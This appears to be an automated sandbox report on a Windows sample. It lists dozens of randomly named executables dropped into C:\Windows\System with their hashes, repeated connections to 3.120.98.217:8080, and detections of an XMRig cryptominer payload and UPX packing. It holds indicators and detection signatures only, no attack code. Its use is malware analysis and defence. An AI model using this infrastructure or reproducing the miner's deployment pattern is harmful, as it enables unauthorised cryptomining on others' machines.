C:\Windows\System\fmacTNn.exe

C:\Windows\System\gwkYPCm.exe

C:\Windows\System\gwkYPCm.exe

C:\Windows\System\SsDYpna.exe

C:\Windows\System\SsDYpna.exe

C:\Windows\System\GyWPhPn.exe

C:\Windows\System\GyWPhPn.exe

C:\Windows\System\pVDMYnl.exe

C:\Windows\System\pVDMYnl.exe

C:\Windows\System\KEDgARm.exe

C:\Windows\System\KEDgARm.exe

C:\Windows\System\iUcnciK.exe

C:\Windows\System\iUcnciK.exe

C:\Windows\System\BmovFpW.exe

C:\Windows\System\BmovFpW.exe

C:\Windows\System\IYkopcW.exe

C:\Windows\System\IYkopcW.exe

C:\Windows\System\rTSGsOn.exe

C:\Windows\System\rTSGsOn.exe

C:\Windows\System\GpiDNJA.exe

C:\Windows\System\GpiDNJA.exe

C:\Windows\System\uddWuGo.exe

C:\Windows\System\uddWuGo.exe

C:\Windows\System\xohowFE.exe

C:\Windows\System\xohowFE.exe

C:\Windows\System\dnYIReP.exe

C:\Windows\System\dnYIReP.exe

C:\Windows\System\pJZDmRl.exe

C:\Windows\System\pJZDmRl.exe

C:\Windows\System\EccJDiK.exe

C:\Windows\System\EccJDiK.exe

C:\Windows\System\ZjmVGwt.exe

C:\Windows\System\ZjmVGwt.exe

C:\Windows\System\yGienIX.exe

C:\Windows\System\yGienIX.exe

C:\Windows\System\mLpdROz.exe

C:\Windows\System\mLpdROz.exe

C:\Windows\System\ALjgZSO.exe

C:\Windows\System\ALjgZSO.exe

C:\Windows\System\cBBMAtx.exe

C:\Windows\System\cBBMAtx.exe

C:\Windows\System\SUtoMWS.exe

C:\Windows\System\SUtoMWS.exe

C:\Windows\System\AlFBGea.exe

C:\Windows\System\AlFBGea.exe

C:\Windows\System\sEcHIEy.exe

C:\Windows\System\sEcHIEy.exe

C:\Windows\System\peTnLzM.exe

C:\Windows\System\peTnLzM.exe

C:\Windows\System\wxQMAoT.exe

C:\Windows\System\wxQMAoT.exe

C:\Windows\System\Bwvggxt.exe

C:\Windows\System\Bwvggxt.exe

C:\Windows\System\eHfAYuY.exe

C:\Windows\System\eHfAYuY.exe

C:\Windows\System\xtnAYWN.exe

C:\Windows\System\xtnAYWN.exe

C:\Windows\System\udeGPdO.exe

C:\Windows\System\udeGPdO.exe

C:\Windows\System\ipxmdMy.exe

C:\Windows\System\ipxmdMy.exe

C:\Windows\System\RiGJGAE.exe

C:\Windows\System\RiGJGAE.exe

C:\Windows\System\OXRQvNW.exe

C:\Windows\System\OXRQvNW.exe

C:\Windows\System\mQALjOk.exe

C:\Windows\System\mQALjOk.exe

C:\Windows\System\WeAhfdg.exe

C:\Windows\System\WeAhfdg.exe

C:\Windows\System\WFWItKM.exe

C:\Windows\System\WFWItKM.exe

C:\Windows\System\VdtqvYa.exe

C:\Windows\System\VdtqvYa.exe

C:\Windows\System\DqCYayv.exe

C:\Windows\System\DqCYayv.exe

C:\Windows\System\HJpoREm.exe

C:\Windows\System\HJpoREm.exe

C:\Windows\System\YHjIPUs.exe

C:\Windows\System\YHjIPUs.exe

C:\Windows\System\WMtXaJh.exe

C:\Windows\System\WMtXaJh.exe

C:\Windows\System\ikJnwJP.exe

C:\Windows\System\ikJnwJP.exe

C:\Windows\System\qKDOHFa.exe

C:\Windows\System\qKDOHFa.exe

C:\Windows\System\gcfFmIK.exe

C:\Windows\System\gcfFmIK.exe

C:\Windows\System\JckdqVa.exe

C:\Windows\System\JckdqVa.exe

C:\Windows\System\OmCbXPs.exe

C:\Windows\System\OmCbXPs.exe

C:\Windows\System\dKrCMpo.exe

C:\Windows\System\dKrCMpo.exe

C:\Windows\System\EklWXeA.exe

C:\Windows\System\EklWXeA.exe

C:\Windows\System\GIVnWyE.exe

C:\Windows\System\GIVnWyE.exe

C:\Windows\System\fdubZpu.exe

C:\Windows\System\fdubZpu.exe

C:\Windows\System\dqoSGZb.exe

C:\Windows\System\dqoSGZb.exe

C:\Windows\System\pHRsdTm.exe

C:\Windows\System\pHRsdTm.exe

C:\Windows\System\TyWotJp.exe

C:\Windows\System\TyWotJp.exe

C:\Windows\System\OOdaTxM.exe

C:\Windows\System\OOdaTxM.exe

C:\Windows\System\IxiItFz.exe

C:\Windows\System\IxiItFz.exe

C:\Windows\System\gOqBNcZ.exe

C:\Windows\System\gOqBNcZ.exe

C:\Windows\System\kfyxcCN.exe

C:\Windows\System\kfyxcCN.exe

C:\Windows\System\hmqnzDN.exe

C:\Windows\System\hmqnzDN.exe

C:\Windows\System\OmhfNCT.exe

C:\Windows\System\OmhfNCT.exe

C:\Windows\System\GlHYUFs.exe

C:\Windows\System\GlHYUFs.exe

C:\Windows\System\htYelLh.exe

C:\Windows\System\htYelLh.exe

C:\Windows\System\pfBMaJH.exe

C:\Windows\System\pfBMaJH.exe

C:\Windows\System\yQbkVSW.exe

C:\Windows\System\yQbkVSW.exe

C:\Windows\System\IclMgnv.exe

C:\Windows\System\IclMgnv.exe

C:\Windows\System\mxkBpJu.exe

C:\Windows\System\mxkBpJu.exe

C:\Windows\System\OykdXfE.exe

C:\Windows\System\OykdXfE.exe

C:\Windows\System\AYxCNVW.exe

C:\Windows\System\AYxCNVW.exe

C:\Windows\System\EraAMJe.exe

C:\Windows\System\EraAMJe.exe

C:\Windows\System\ltdSbhA.exe

C:\Windows\System\ltdSbhA.exe

C:\Windows\System\ccKzxam.exe

C:\Windows\System\ccKzxam.exe

C:\Windows\System\uwGkmAT.exe

C:\Windows\System\uwGkmAT.exe

C:\Windows\System\uExpLMM.exe

C:\Windows\System\uExpLMM.exe

C:\Windows\System\ImOViih.exe

C:\Windows\System\ImOViih.exe

C:\Windows\System\svTpuLf.exe

C:\Windows\System\svTpuLf.exe

C:\Windows\System\QLThzfk.exe

C:\Windows\System\QLThzfk.exe

C:\Windows\System\PGSTXBt.exe

C:\Windows\System\PGSTXBt.exe

C:\Windows\System\qJklaJa.exe

C:\Windows\System\qJklaJa.exe

C:\Windows\System\bGcPdbd.exe

C:\Windows\System\bGcPdbd.exe

C:\Windows\System\TxYqddQ.exe

C:\Windows\System\TxYqddQ.exe

C:\Windows\System\rhHgwSW.exe

C:\Windows\System\rhHgwSW.exe

C:\Windows\System\jcBBbKV.exe

C:\Windows\System\jcBBbKV.exe

C:\Windows\System\GhZZpes.exe

C:\Windows\System\GhZZpes.exe

C:\Windows\System\WeqWcRe.exe

C:\Windows\System\WeqWcRe.exe

C:\Windows\System\PrUpZGI.exe

C:\Windows\System\PrUpZGI.exe

C:\Windows\System\suJcsnM.exe

C:\Windows\System\suJcsnM.exe

C:\Windows\System\zXQXlde.exe

C:\Windows\System\zXQXlde.exe

C:\Windows\System\yeucPvn.exe

C:\Windows\System\yeucPvn.exe

C:\Windows\System\UHGaaep.exe

C:\Windows\System\UHGaaep.exe

C:\Windows\System\FcLMuol.exe

C:\Windows\System\FcLMuol.exe

C:\Windows\System\SGZorLi.exe

C:\Windows\System\SGZorLi.exe

C:\Windows\System\rlnkjjb.exe

C:\Windows\System\rlnkjjb.exe

C:\Windows\System\ZQDqaAE.exe

C:\Windows\System\ZQDqaAE.exe

C:\Windows\System\bFSwBPG.exe

C:\Windows\System\bFSwBPG.exe

C:\Windows\System\RKCoWuL.exe

C:\Windows\System\RKCoWuL.exe

C:\Windows\System\aeHyNmf.exe

C:\Windows\System\aeHyNmf.exe

C:\Windows\System\EBfelIe.exe

C:\Windows\System\EBfelIe.exe

C:\Windows\System\FIixqWB.exe

C:\Windows\System\FIixqWB.exe

C:\Windows\System\GHlBSKw.exe

C:\Windows\System\GHlBSKw.exe

C:\Windows\System\WmqfeAd.exe

C:\Windows\System\WmqfeAd.exe

C:\Windows\System\SDXTPaB.exe

C:\Windows\System\SDXTPaB.exe

C:\Windows\System\wvVHzRM.exe

C:\Windows\System\wvVHzRM.exe

C:\Windows\System\wbLaEyG.exe

C:\Windows\System\wbLaEyG.exe

C:\Windows\System\deAbqgB.exe

C:\Windows\System\deAbqgB.exe

C:\Windows\System\fNkyHoL.exe

C:\Windows\System\fNkyHoL.exe

C:\Windows\System\VXkCTFq.exe

C:\Windows\System\VXkCTFq.exe

C:\Windows\System\AEtVChj.exe

C:\Windows\System\AEtVChj.exe

C:\Windows\System\TvfvZup.exe

C:\Windows\System\TvfvZup.exe

C:\Windows\System\izrZofP.exe

C:\Windows\System\izrZofP.exe

C:\Windows\System\ngrPnqw.exe

C:\Windows\System\ngrPnqw.exe

C:\Windows\System\ClGHigy.exe

C:\Windows\System\ClGHigy.exe

C:\Windows\System\rGNHAJn.exe

C:\Windows\System\rGNHAJn.exe

C:\Windows\System\avukRNr.exe

C:\Windows\System\avukRNr.exe

C:\Windows\System\dkuLVgY.exe

C:\Windows\System\dkuLVgY.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/2356-1-0x000000013F150000-0x000000013F546000-memory.dmp

memory/2356-0-0x00000000000F0000-0x0000000000100000-memory.dmp

C:\Windows\system\FfVndNF.exe

MD5 c2ddf0844046bd0e3066406c2a609d48
SHA1 0656585a891087496f6827f4c4c45de9296f6612
SHA256 25c13c9b2026814d86f487365de8dac459819765ed4ae245e3c2973ae4411267
SHA512 37fea37eadc4aee4f97e8b5fae60442ca6f0b7af7af65dac2265b2b17ec2c2eb1419de86e585bf6fa7fa435842023282ec20a93b0d067d446dcf1c87f05ddfb4

memory/2356-8-0x00000000030C0000-0x00000000034B6000-memory.dmp

memory/2628-9-0x000000013F370000-0x000000013F766000-memory.dmp

C:\Windows\system\llSHySI.exe

MD5 5b488357717d2900d90f598a3385dc66
SHA1 426a2ce5b0e62359cd68a946d50e901d281f8996
SHA256 092cd6dcc13d4392845849cd30b9b42bab052fba761075fad06ce06175b28357
SHA512 4199031ba3f967d1017f46255ab3c32227801328bc6fca13e9c79c03229ec7694229f1704699e3b027d20df582f41708e1bc9c48e7c1d4361b1e71d47fd9a45e

memory/2356-22-0x000000013FD20000-0x0000000140116000-memory.dmp

C:\Windows\system\CYaIgYH.exe

MD5 51661a3802cbec2832b46abedc04ef8f
SHA1 725f457ccd4730c87706a44bc33a548e8b8fc22c
SHA256 69b541d95c0ee3a4e944a834747d391027c7afba74c4956c2b4600cd64eaf8e1
SHA512 7d10e74cafc3a07a4c9c6bf850f9c79e89f2cd4dd9383a77ac644a34b52eaa100fa694789c40cf50ee03169caba9819a16e3a89c4c7dc9d00d0c1fb25a394fee

memory/2356-41-0x00000000030C0000-0x00000000034B6000-memory.dmp

C:\Windows\system\tMgOoUw.exe

MD5 5e74ab39980d2cc1c37b1980f1c87cdf
SHA1 aa6f47b7d157a8c69501ce2b7c8dfccc621574dc
SHA256 8d53c1392375255d392d3fb10a319af40eb19d3d882a79815fc681609261f5a9
SHA512 bf676c0f2e7150a581592e341a66f2590e9abcb38a77baf08867e7ad7d578df1f797320bb2b7f3b8a12fb7d0d0f514c40dbdd398ad983be14d222a718edd0c06

memory/2472-47-0x000000013FFB0000-0x00000001403A6000-memory.dmp

memory/2616-57-0x000000013F080000-0x000000013F476000-memory.dmp

memory/2440-67-0x000000013F470000-0x000000013F866000-memory.dmp

C:\Windows\system\FfKsjAm.exe

MD5 62fc8fdefacf3775cea2fe136659d54e
SHA1 12d5a2588a37de34e7f3997ec8df0841c4b7125e
SHA256 1e6bba23f240b2363996528368b1771879bc00750a83a4aaac9b8bf1b6aedec6
SHA512 5d535f688b924ca5e478bb116ee52a1273e9b1936fa8bc185b0314b3f149a467047f22c4c52fa1233de65aa971fde902a843731b0d331c3726be90b8b2bd478b

memory/2944-71-0x000000013F170000-0x000000013F566000-memory.dmp

memory/2500-66-0x000000013FD60000-0x0000000140156000-memory.dmp

memory/2396-73-0x0000000001D20000-0x0000000001D28000-memory.dmp

memory/2396-72-0x000000001B680000-0x000000001B962000-memory.dmp

memory/2356-58-0x00000000030C0000-0x00000000034B6000-memory.dmp

\Windows\system\dYzsBxK.exe

MD5 53861378d6a9b263108264bb142d5c30
SHA1 6f960d1a483522e2038d7189e582728477614f89
SHA256 15c1d6cceb0a41a7ec1e60c537425963cc48e817356b5c8de894c3ab8887e11e
SHA512 cad4d5476e0e422f86ad3fa81ec536d317cf510dbb80178525a13068a582971b423dc3ff4d59a2e50f20e0818b18141de6caa613d288a607f891d16404f14581

memory/2356-64-0x000000013F150000-0x000000013F546000-memory.dmp

C:\Windows\system\DAFYvPk.exe

MD5 e0e7cfebcdd08bc081566e99cd2bec12
SHA1 5e7b8e1e99bca5c2fe834946789bc264bbee0899
SHA256 660881d6ce56e659b8296be1be59d6785641f3678c7f300aa7b6b426180a6206
SHA512 0334f40edf081f8217cf910d2432e4fef70aa13674bdfe950f696a42e08bae0a1e6925f4c76629c673eaf572fe78f73fa16a940585e40d097052e4eb13fdc928

memory/2356-53-0x00000000030C0000-0x00000000034B6000-memory.dmp

C:\Windows\system\dAQyTqN.exe

MD5 141b9d9d9e92264d3d172aacd1bb382a
SHA1 4826ada3ba5c2b916b35e13f44adb1771e2e63ba
SHA256 5ec50ef3a9d1c3e31cdd110e34b83f07e16bd1af704aa087d0790685020f6fbd
SHA512 6bea430af54bbcc43145be7e260c0459cfc82ba03bad294057aa9cd3abbf4dbbc8e17e30d3c37f5aaef6181a19d13ea36fab9cdc46c3d0510978e01a846a108c

memory/2856-40-0x000000013F180000-0x000000013F576000-memory.dmp

C:\Windows\system\jtCxZJv.exe

MD5 99fc1345b81ac77ed23898db22e67d09
SHA1 6c54d79a51e300b29ece98d2d46e31f406906586
SHA256 fb3b6c910e587abddb634eebc8f068ad0e9b31047e44fdda7665c2d4054a0b30
SHA512 42662753ec0d7bed6baf36247b0ec783a38a1bdb8db32751e01dcf8616f754fcc4e98ead680539df76fb0b5db05baaa21429078cace6311a4072dcb899c7ddea

\Windows\system\tJOEUEw.exe

MD5 1eee4cc0507bc4ecf95057f32a291509
SHA1 35d6bd89584da8ee34491991259b24504faa608a
SHA256 f35cee1caddd0ef5ae0b69a8455698e6ec983afe11b9fe4b92a7034af5be329d
SHA512 338ef1d8cb9dd4018ba082d77a9a961f428993f8f2f984e8ff7fe2c58da7e35a09bb34facd737e637f0fc4e4b286effbfcee9844c2c60cc00d201be6b66c3080

C:\Windows\system\vDLlHmF.exe

MD5 9b789e0e9abe589ae6e4bdd4d30872f7
SHA1 0e077faf94e8fc7b4c0e2b9faf84f21f80abf5a8
SHA256 eafcd07110b554d8017a194a9d2fd83d40d60f98da3c2623f752007ef61a2568
SHA512 7e77e0dea47565d17a67ab009a546950d24f08869ccdbe944e2baea69b43e2d6419807ffed8ccbfbb10085faee9824c7b3a7d74918f5e4d214e32e2432fb319d

C:\Windows\system\IwRawcL.exe

MD5 e388f0b5d5b4d70768cd76aa27d02b96
SHA1 1604b518979dde97a74dd866ae66458dbe1591cd
SHA256 03b8107932c452b83b0c5c9753db20a0026217b30cb59dc7c6aaa4d93daa6596
SHA512 5505402a9b359a6693fa4751a255449df0eb6520408e1d0e88d309df05f3a8754654d6bb6603bb533c53a802d61dc6c4a8ab12fd3c40be9dfe440c678d2c6856

C:\Windows\system\TpkqoNA.exe

MD5 35112d7d2fc8db458a1f825b88f14e2b
SHA1 941953623639057ad15d4e87b13360133789a7b0
SHA256 6c8f1c438ff69f25e69be7e8b43470d1a08b4e4fb418f6d2eaa1177f9caf249a
SHA512 7e8fb33dea476d6b41cb16997d168b7a279c25b8ad41c082bd7ac501dff0aa8ae0f033ea6af9d36b7387f56122bf18d5729c2e553b4899470d254fe0830269a9

memory/2356-95-0x000000013FBB0000-0x000000013FFA6000-memory.dmp

memory/2356-104-0x000000013FFE0000-0x00000001403D6000-memory.dmp

memory/2356-105-0x000000013F9D0000-0x000000013FDC6000-memory.dmp

C:\Windows\system\odTtZfG.exe

MD5 b59681d0764acd7d6e2442dde14bf0f0
SHA1 539f9a4f2c7be2c61c93bb379d8f29ae6dc69e38
SHA256 3d5c7af286e30bdfe2a5175e37cb5c35b28625b84dd990227be24ce40d35322a
SHA512 edf30e002d234cac176bfbdf267babcc5c44a1a4a6a472a1242965622504de01b84508a13571d9d98c0769b1a76fc825b011dd62b26d1a05eb5c7321f231ae55

C:\Windows\system\LYiABLS.exe

MD5 16d4c5b8378dc7c9cef328a3b88c1348
SHA1 e3abadf8c0092ce93d0eefedd9c4cdf955eb39dc
SHA256 32b05fd302a4036b1b807fa9aa2689528b518dc22a9d9011e6cce41a1fbb88bf
SHA512 38edd344ae3f25ff9c1ce51e68ef3ba8f5acabc79a52685a8bf7f3d35b64fa540a35843d163dbac394288e4097d52338fc2fde53e9686d3cc88dbd250a796138

C:\Windows\system\ABLgFgU.exe

MD5 65f0b4a429e38bf70a39d386c7dcd272
SHA1 5217e391b44aca8747069456d1dc330dfe026682
SHA256 a1be93552227e37e17072eb96e25db0d2c9caab06a3fc691087503da321dfcdc
SHA512 d620e822f9291e7a165ef33f242d3f1c1c51d0ff5933826e250cc2343c433449f0dc295ade6280fc8ac14e94d905cd982a4ee51f4e29e8309aa237e852590beb

C:\Windows\system\jsUsKBi.exe

MD5 4617376a11a8ec6b5cba62893e1b5e31
SHA1 0588bbbeed1d168836ab4cd27bcedb702ec2c8c5
SHA256 cda3f0d8d84ef39f2fc37e3b26d287027b2ca79bb95583fac4be35792b1e3051
SHA512 0cc1ef4f231b97c915d998e03f11912a0e5f5520fac0ed343d0fb1a65c79d9a3884b6ab7e3264c44d5d7d5063dbb5d0486af574c6e076d1c708355f3e668596b

C:\Windows\system\OcaOFDU.exe

MD5 588d13c347f85c5f137fa9bb62f66f2d
SHA1 476e17edfa6b53ae311f8fe0a43dfa4e8cb1603a
SHA256 5b3178dff62dbc325e5f0fc3d6e3d25afb433c67be6e916c6c3a482ad496bb0f
SHA512 1c1de168cb36dc4b090f5806e81ba56f2b13cd76c20543ed6a7a5d42f47f3aa7f68e9dbc4147615a65e9edc3e9aa59df352015e9d245f339aac5de830b2e05b6

C:\Windows\system\EUTgGGF.exe

MD5 03cdd26a01982462bf9a286111f27b70
SHA1 626a892fee3bfc6480516fdd0f4b30b468ceccdf
SHA256 3eed28442c4702c038f2f8610995124cc43bb5b0482b88aa840bd4ba56b46bd0
SHA512 95ece0ef3faba01eaa143775c9129141cdafed00e08f1bbba2d1ce13243f76389fcb7ab70ceeb4af85aba02a1632984bb3ba494050fdcdd808383f4cdde0f74a

C:\Windows\system\AlpnrbW.exe

MD5 340c02948884686ba4ba1402c6afa02d
SHA1 10294073505e90c2d3ad96db69da7574a8cc4040
SHA256 f1f37c715b44c3f5a01373a5b5ae2a7de4f8e053f9992685cad2f98fad2fe2f8
SHA512 03ba0f5fef78dd4cca01987c4230c8595b871f1c2d6fc7ed998f29b8bd36889482c81e205e09c9793000ec2bcd6693d6dcbcdd4a6de56e973c699459d44bce30

C:\Windows\system\FqgWpFu.exe

MD5 0949531fe1a789133d59bb56dd59b3ee
SHA1 3a88d51dd14d19160f266d66ec431d71410018b3
SHA256 4f751522e4cbf68a118af9e9664855401c3035ee895a7382560a626c3b95d166
SHA512 efa36eb055319ce30258c479560c873a624583703989726ca76f6306f4ffc7cf81011ae4813cb48b0040fcdaec2c95d3134cda33fb8f2f12fa2166f87b219e6a

C:\Windows\system\jkhrtYs.exe

MD5 a42ae99813af807681fe8689f5cd8519
SHA1 f4204d71cbe7cc7084360f17d607cc39e2ce9f63
SHA256 6f2f4f678413430b6711129453a025cba143d748eb87e511278e749ded7b2d2b
SHA512 9d79c606c1379c9efd1723adf565b6518177bcfdccbae514b2908bf49aa62340f3d61e5abf131cbd8e5ad6e208ab006daa695c3bbe04463743492e02ffa02cf1

C:\Windows\system\mUwtJJg.exe

MD5 7ebbb452e80cb5e242c3838e936a7af8
SHA1 925a551976b39066fdfbc3830696f6ba09fdb765
SHA256 04df84a5475365d4ee699ce1b80d4da8b5a695a2d6712a2c07347d7f4f11b76a
SHA512 2cfe7c145eed39f955a1c9e1d683641e6c49fb3168afd536431a94fbe1daf079ee588ac06b70d815d19d7319bdbf9c0db13a19b6a02bd73afeca8468002f2cc0

C:\Windows\system\UPqFffY.exe

MD5 a7400dbf0e5472e938f00a035c94d70b
SHA1 41d2bec4d4c1fab3fab5070e774e82140d524002
SHA256 411c30b616ffacf9d4afbdf69e75b9b68f6e9b24f72791f1a637b002ff775e64
SHA512 1119ca4df77fe2774b72d98ce7b95829560b012b5200dea8e88c29f795fb4eefdf1c3423b4a0ff75a9150799beff38b514b0a200a0916c1cd61add09d54f21fd

C:\Windows\system\vxHpUDx.exe

MD5 faedc02d4efa6df2c2302a7b8fe821db
SHA1 eac9089ed6003058abadd44c66b92b13f88d8cbf
SHA256 ddf3f42df4a6039e4d6efed15015f2740ea5b55faddac6d2a06fb2b6b9bd4eca
SHA512 cd553bfdb31406fb4225d6794dee2df2c7e9310c39f49083c1bb3505e0d3eec8f06f7117101c6bed52cda8b783e58466bfc2192d3405eddaa939cea5ea91b670

C:\Windows\system\MvLfXbp.exe

MD5 484c9d240242ceb4070022ebc8a326a2
SHA1 5966f91a059bb0fe21c65b0ab575788a6219db12
SHA256 a6d7402655421280a055f57a1446e7648920d9c2528850890371b15753a56acf
SHA512 e8a7e8a53488314ad48952158d2ffc2255b14b273c3f05622f2ee5003017b72b26b2907eb81275f55ee30540650d61150498a9dd41da878d7943c94d1fd0247d

C:\Windows\system\kQKSDoh.exe

MD5 f0647710c3f660260522c9910f6277be
SHA1 2d9defcdf656f3f546da3cc5a680ed7659f007f2
SHA256 bec34bd600b85f9b75df217b518b8fd5cfdb30d9963048ca6453e8479cc14d03
SHA512 ad5e0ff9b3d9a86615c0739eb874799354c286814decbccb9cb00afe0bb3ab74f2b267e400bf53bedf841f087e63fe54f70025a538a1762cbcfff83b882ce647

C:\Windows\system\VqFbeRe.exe

MD5 c2e1bafcff96f759bbf3900cc2d83f20
SHA1 9c45381b9930cdf15dfa92377d2a82c090c4a784
SHA256 621fc6b97fce186e3870cc18e19ec6a5c00797f60bd8761bb5469d1aef5e2ddb
SHA512 a0d4849fc7298b6418b39e0158a8ae74c502b5a7e5a4560988614a70a3e2e7843cd9cf1c6461f8c0f56e81fd38cd626151b916e3b7474f4f7e35da3f7b2cc8a9

C:\Windows\system\MowaUVv.exe

MD5 07c00387fb755d3fcd0c7f3ef769f750
SHA1 77f421bde51fdcc5d8073b878e46045d0f07672d
SHA256 27c464d27d3ca3d31c32a4c054f04ff142d920daebfb2b6f7a3b45bc4eff3d54
SHA512 faf662841b9be53f7ea0880904d48347895b1919d86ddb22532b71a69c06eb0c4d9963e352ac750fa07b4394ed5972f1ce4466dc69352f267a535eca15f3f8b9

C:\Windows\system\CjQgaty.exe

MD5 682ee3de1930d4bd8b74e6539278b520
SHA1 80607b13f831bdaf8b5d7517f47bef015fb188a2
SHA256 8f886513be530c5a49cfa21b8377805c2d1977920b85ad3f0df1ed5cb7e79dcd
SHA512 da8afd91e78bea59df96b5e183ba2ecc76fadd0c82d521ed41abe0fa29c0d701e976dd0803d1f17fab216f9649039d44aa27e0e0d4edc37f55846b9e1891eb59

memory/2680-99-0x000000013FBB0000-0x000000013FFA6000-memory.dmp

memory/2396-39-0x0000000002C50000-0x0000000002CD0000-memory.dmp

memory/2864-38-0x000000013F0E0000-0x000000013F4D6000-memory.dmp

C:\Windows\system\nVbdTzY.exe

MD5 129c1a2472440605693ef484a5ee7772
SHA1 b8024424413bcc9fcfe63fdf416c7b2e2515f1b6
SHA256 4682caadd10a76738de813232c3b6e90260d99c0ffabb32ec83f48f6bba9ede2
SHA512 801c6ec8d0eaf3ff3f006639a2394a7ab71f32f81a53cb313154933dd70de96e69045a23bf2817faa1765bd78ee871ea9f1afbb1282210eb2aa211487e014010

memory/2592-23-0x000000013FD20000-0x0000000140116000-memory.dmp

memory/3064-21-0x000000013F3F0000-0x000000013F7E6000-memory.dmp

C:\Windows\system\wVXsIox.exe

MD5 9e591fd4d83197c2d84b7d210c010f3c
SHA1 1c5180e507f0e6f8f5afe17ec62e581d42e3d4dc
SHA256 1ab0e4687471f71c0787915ae29ce0061189431cffb197482371ac20c798fec9
SHA512 c5438bb5c9ed648e2c2d5029508fdf5de8131780fb0f2ea182f75171fbcefe9b4548a1ee1158b403afc982def50e4b4d313a215dc0dd1c47a45653f7db9d417c

memory/2356-18-0x00000000030C0000-0x00000000034B6000-memory.dmp

memory/2500-3310-0x000000013FD60000-0x0000000140156000-memory.dmp

memory/2944-3766-0x000000013F170000-0x000000013F566000-memory.dmp

C:\Windows\system\FUVwwBw.exe

MD5 62e737fa5bfcc7aae2c944fe6887f795
SHA1 b32af7867b93d4fc848b57818ea90a4241da9175
SHA256 bb7e708c153eb4a5a7dcdf499640b7784cdd33e6b604449b9e678d67347dabf6
SHA512 0d2ad93062677bad677b18b889b8ecdce36884304efff9cccc54248b3f61a0da4a26f00e9f26b8f87a50dfc722e6a3521d25202821fe229cb80378cfe84bbdbf

memory/2592-6203-0x000000013FD20000-0x0000000140116000-memory.dmp

memory/2440-6225-0x000000013F470000-0x000000013F866000-memory.dmp

memory/2616-6223-0x000000013F080000-0x000000013F476000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 23:42

Reported

2024-06-13 23:45

Platform

win10v2004-20240508-en

Max time kernel

64s

Max time network

62s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe"

Signatures

xmrig

miner xmrig

Detects executables containing URLs to raw contents of a Github gist

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX dump on OEP (original entry point)

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
